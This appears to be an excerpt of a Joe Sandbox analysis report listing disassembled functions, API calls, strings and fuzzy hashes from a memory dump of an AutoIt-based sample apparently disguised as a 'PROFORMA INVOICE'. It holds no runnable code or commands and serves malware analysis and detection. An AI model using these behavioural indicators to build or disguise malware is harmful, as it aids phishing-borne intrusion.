OleSetContainedObject.OLE32(?,00000001), ref: 00F9DEAA

Strings

AutoIt3GUI, xrefs: 00F9DE22
Container, xrefs: 00F9DE29

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 04df48e4558c015765c3e3d9cb6a32166b68eb8444da08ef733d3b58213c3fbb
Instruction ID: 21009da6229617f0a4d58bb23560df19bba3ee56ee01a6e5dbe89b06568179e8
Opcode Fuzzy Hash: 04df48e4558c015765c3e3d9cb6a32166b68eb8444da08ef733d3b58213c3fbb
Instruction Fuzzy Hash: 98915874600601AFEB24DF64C885B6AB7F9BF48714F20846EF84ACB691DB71E841DB60

Function 00FADE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7C6F4: _wcscpy.LIBCMT ref: 00F7C717

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

__wcsnicmp.LIBCMT ref: 00FADEFD
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00FADFC6

Strings

LPT, xrefs: 00FADEF7

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: e1c7073c620bdd59301d6a03c5b37c4c361d402642dc81706a0328373db0d301
Instruction ID: c3f0abb4fe1c181f8af59556776bdb10a98a9ea0b7871a68bd81e05ccc4c3b17
Opcode Fuzzy Hash: e1c7073c620bdd59301d6a03c5b37c4c361d402642dc81706a0328373db0d301
Instruction Fuzzy Hash: CD6192B5E00215AFCB14DF98C881EAEB7B9EF19310F008059F546AB391D774AE44EB91

Function 00F7BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00F7BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 00F7BCF3

Strings

@, xrefs: 00F7BCE8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 56783a31bd3856cb3cfe60077052b0a6550093cd238b4eac3da4d0eca4e2abe9
Instruction ID: 74fa761a7549989fb2d590a387942d889fb0cb1970176545be2a7c5a1712a2eb
Opcode Fuzzy Hash: 56783a31bd3856cb3cfe60077052b0a6550093cd238b4eac3da4d0eca4e2abe9
Instruction Fuzzy Hash: AA5156714087449BE360AF14DC86BAFBBE8FB98354F418C5EF2C8411A6DF7584A89753

Function 00FAC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00F644ED: __fread_nolock.LIBCMT ref: 00F6450B

_wcscmp.LIBCMT ref: 00FAC65D
_wcscmp.LIBCMT ref: 00FAC670

Strings

FILE, xrefs: 00FAC5A5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: f5bf25789021aad2cf66b8c03d77696dfbf96d32910d854280b2d2dc373fc81f
Instruction ID: f2161cab13853369bb64bcf7b2ed1b5d8b6628ab8b43831e5e684f278b4d8075
Opcode Fuzzy Hash: f5bf25789021aad2cf66b8c03d77696dfbf96d32910d854280b2d2dc373fc81f
Instruction Fuzzy Hash: C441C972A0420A7BDF11EAA4DC42FEF77BDAF49714F000469F605EB181DB75AA04DB91

Function 00FCA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00FCA85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FCA86F

Strings

', xrefs: 00FCA7C3

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 409b6d74e858bd44a1f578d740871877803db4e4d3938c97b29c105d5e6cc445
Instruction ID: c69d82a9c7fda26e810a3ccf6693c9a77b3f26df1084cbc2f40570d6bdfbb97b
Opcode Fuzzy Hash: 409b6d74e858bd44a1f578d740871877803db4e4d3938c97b29c105d5e6cc445
Instruction Fuzzy Hash: 8A41F475E0120A9FDB14CF68C981FDA7BB9FF08314F14016AE905AB381D774A946DFA1

Function 00FB5180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FB5190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00FB51C6

Strings

|, xrefs: 00FB51B5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: f85012170d5eab0a5c665347ddb3d146d91fb9b78e9a0cb64451edfde37645a3
Instruction ID: 1edc5c9f9cc1765a98b75cb0066cb1d21fb6ef856f0362b2bd4b0302b9356138
Opcode Fuzzy Hash: f85012170d5eab0a5c665347ddb3d146d91fb9b78e9a0cb64451edfde37645a3
Instruction Fuzzy Hash: 52312A71D01119ABCF01EFA5CC85AEE7FB9FF14710F004015F855A6166DB35A946EBA0

Function 00FC975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00FC980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00FC984A

Strings

static, xrefs: 00FC97AA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 5e317276e846b1fa0da2055c9de780433c26f0e7cf99038d8d9bebca5b0617e9
Instruction ID: 598c61f6684d22771cb669b131f7a578c6febe2995ae7fdf94ca0d44e73aa675
Opcode Fuzzy Hash: 5e317276e846b1fa0da2055c9de780433c26f0e7cf99038d8d9bebca5b0617e9
Instruction Fuzzy Hash: 7831AB31510205AAEB109F38CC86FFB73A9FF98720F40861DF8A9C7190CA75AC81E760

Function 00FA5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FA51C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FA5201

Strings

0, xrefs: 00FA51BF

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 9ee93907a744a0679a4e4e651c5107de9191b524106e61cb2ec9f3588230c73f
Instruction ID: 03cc205d20626f77dd04eb2bd193f41ea20c64a8abd76f3992ce06d0afb35161
Opcode Fuzzy Hash: 9ee93907a744a0679a4e4e651c5107de9191b524106e61cb2ec9f3588230c73f
Instruction Fuzzy Hash: 5231F8B2E00704DBEB24CF99D845BAEBBF8FF46760F144029E985E6190D7749A44EB11

Function 00FB658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00FB6608

Strings

AUTOITCALLVARIABLE%d, xrefs: 00FB65FA
, $, xrefs: 00FB6648

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 6de02ed4ae15841d51c9427b0f61f5145597c661ca4498202febc992aa70ab66
Instruction ID: 4bddc45ba4acbcf586927ad4b0da697373db24b5596d22236302e70c815955a7
Opcode Fuzzy Hash: 6de02ed4ae15841d51c9427b0f61f5145597c661ca4498202febc992aa70ab66
Instruction Fuzzy Hash: F4218771A00218ABCF10EFA5CC82AEE77B5BF49700F000469F405EF146DA78EA45EBA1

Function 00FC93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FC945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FC9467

Strings

Combobox, xrefs: 00FC9429

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 7d0687979704c037b59da16af9c96debece9d679d412e5950fa011b86f9bcc8f
Instruction ID: 406ab058d0d3194b79c4124ae50802888110cf71e6c242b678dde9b30f7458c0
Opcode Fuzzy Hash: 7d0687979704c037b59da16af9c96debece9d679d412e5950fa011b86f9bcc8f
Instruction Fuzzy Hash: 6711D07160420AAFEF25CE54CC86FAB376EEB483B4F104129F9189B290D6B59C52A760

Function 00FC98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00F7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F7D1BA
Part of subcall function 00F7D17C: GetStockObject.GDI32(00000011), ref: 00F7D1CE
Part of subcall function 00F7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F7D1D8

GetWindowRect.USER32(00000000,?), ref: 00FC9968
GetSysColor.USER32(00000012), ref: 00FC9982

Strings

static, xrefs: 00FC9945

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 7bd4167ce92cd804c3d63caf0d7a345e68cb08292cc414d1d8e288fa5c09015a
Instruction ID: c936f69f8a2fe02ead37688270a30991fd0cddc28eb81872ac3dfa06b1951ebd
Opcode Fuzzy Hash: 7bd4167ce92cd804c3d63caf0d7a345e68cb08292cc414d1d8e288fa5c09015a
Instruction Fuzzy Hash: 4E11597292020AAFDB14DFB8CC4AEEA7BA8FB08314F01461CF995D3140D775E810EB50

Function 00FC9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00FC9699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00FC96A8

Strings

edit, xrefs: 00FC967D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: fa62e364373280f5506d846b271a49e10e089b43c2432b082af75b91d9f57801
Instruction ID: 661aa184f34a29523de0a0d26354fa41e4b27795ec844c2bd1c4440152340eb4
Opcode Fuzzy Hash: fa62e364373280f5506d846b271a49e10e089b43c2432b082af75b91d9f57801
Instruction Fuzzy Hash: 12119D7190410AABEB204F64DD8AFEB376AEB05378F504318F965971E0C7B5DC50B760

Function 00FA5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FA52D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FA52F4

Strings

0, xrefs: 00FA52CE

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 476287ab876c44ac1d1a652a933d9dca0a9ba839e6884516a23145013db85a58
Instruction ID: d3767a577143d7686c20f7f4c2b3f87b2a8d0bfc92802a4f0f2abb4308737d87
Opcode Fuzzy Hash: 476287ab876c44ac1d1a652a933d9dca0a9ba839e6884516a23145013db85a58
Instruction Fuzzy Hash: 7C11E2B2D01714ABDF20DE98DD44B9D77F9AB87B60F150025E941E7290D3B0ED08EB90

Function 00FB4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FB4DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00FB4E1E

Strings

<local>, xrefs: 00FB4DE6

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 928e4287dd1c38bff2417913f7d96b6871c3c9adf8a82db84b6841f17497b715
Instruction ID: 1e2d54ea7b7abaef6c4bf6a400c153dc1e9fe80d5f973a1a6cdbb8b2c7314609
Opcode Fuzzy Hash: 928e4287dd1c38bff2417913f7d96b6871c3c9adf8a82db84b6841f17497b715
Instruction Fuzzy Hash: 2011A071901225BBDB258F52C9C9FFBFAA8FF0A765F10822AF51556541D370A840EAE0

Function 00FBA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00FBA84E
htons.WSOCK32(00000000,?,00000000), ref: 00FBA88B

Strings

255.255.255.255, xrefs: 00FBA866

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 4d18dc9f3c17c49cbd47488342b3e7aa793f88fdc7eb109eebab1cd2162a926f
Instruction ID: 53c8568e7a5ec18a7c0ead422e6cc8bd36a375581151c34a1302a5f36561d823
Opcode Fuzzy Hash: 4d18dc9f3c17c49cbd47488342b3e7aa793f88fdc7eb109eebab1cd2162a926f
Instruction Fuzzy Hash: 3801F575600304ABCB20AF68CC86FEDB364FF45720F10852AF5169B6D1D775E801EB92

Function 00F9B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F9B7EF

Strings

ComboBox, xrefs: 00F9B78B
ListBox, xrefs: 00F9B7B9

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: a3897e73e216bb1802d9029d8d6f528d257e9c225e64cb2d67a093d2c96d8126
Instruction ID: 7ce233e565d6a49b79b83dc0bca4c0bf99cc9ba3e35fe68a7093ec1f9abac114
Opcode Fuzzy Hash: a3897e73e216bb1802d9029d8d6f528d257e9c225e64cb2d67a093d2c96d8126
Instruction Fuzzy Hash: D001F772641118ABDF04EBA4DC52DFE3379BF45350B14061DF4E2672D2EB795908AB90

Function 00F9B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 00F9B6EB

Strings

ComboBox, xrefs: 00F9B687
ListBox, xrefs: 00F9B6B5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 4251ed5f255fac72defcca0df884779a8489b9daa96c4cc7125f0732def560fb
Instruction ID: 5d295c943fd4d19e8b1efae650ec9c4ce8f1dd46cf0d18308e241a70121ea936
Opcode Fuzzy Hash: 4251ed5f255fac72defcca0df884779a8489b9daa96c4cc7125f0732def560fb
Instruction Fuzzy Hash: EA01A272A41008ABDF04EBA4DE52BFE73B89F15340F24001DB482B7181DB986E18A7F5

Function 00F9B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 00F9B76C

Strings

ComboBox, xrefs: 00F9B70A
ListBox, xrefs: 00F9B738

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 27e2f4e402e26ae5442d743c40f75c4511470a6401054a412dcff9b0d3c30aab
Instruction ID: 6c5a5d5971846566bae754f585637fceb7a4caf0fe077a96fbed670f94345458
Opcode Fuzzy Hash: 27e2f4e402e26ae5442d743c40f75c4511470a6401054a412dcff9b0d3c30aab
Instruction Fuzzy Hash: BA01D672A41104ABDF00E7A4DE52FFE73AC9B15340F640119B481B3192DB695E09A7B6

Function 00FA7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00FA7762
_wcscmp.LIBCMT ref: 00FA7774

Strings

#32770, xrefs: 00FA776E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
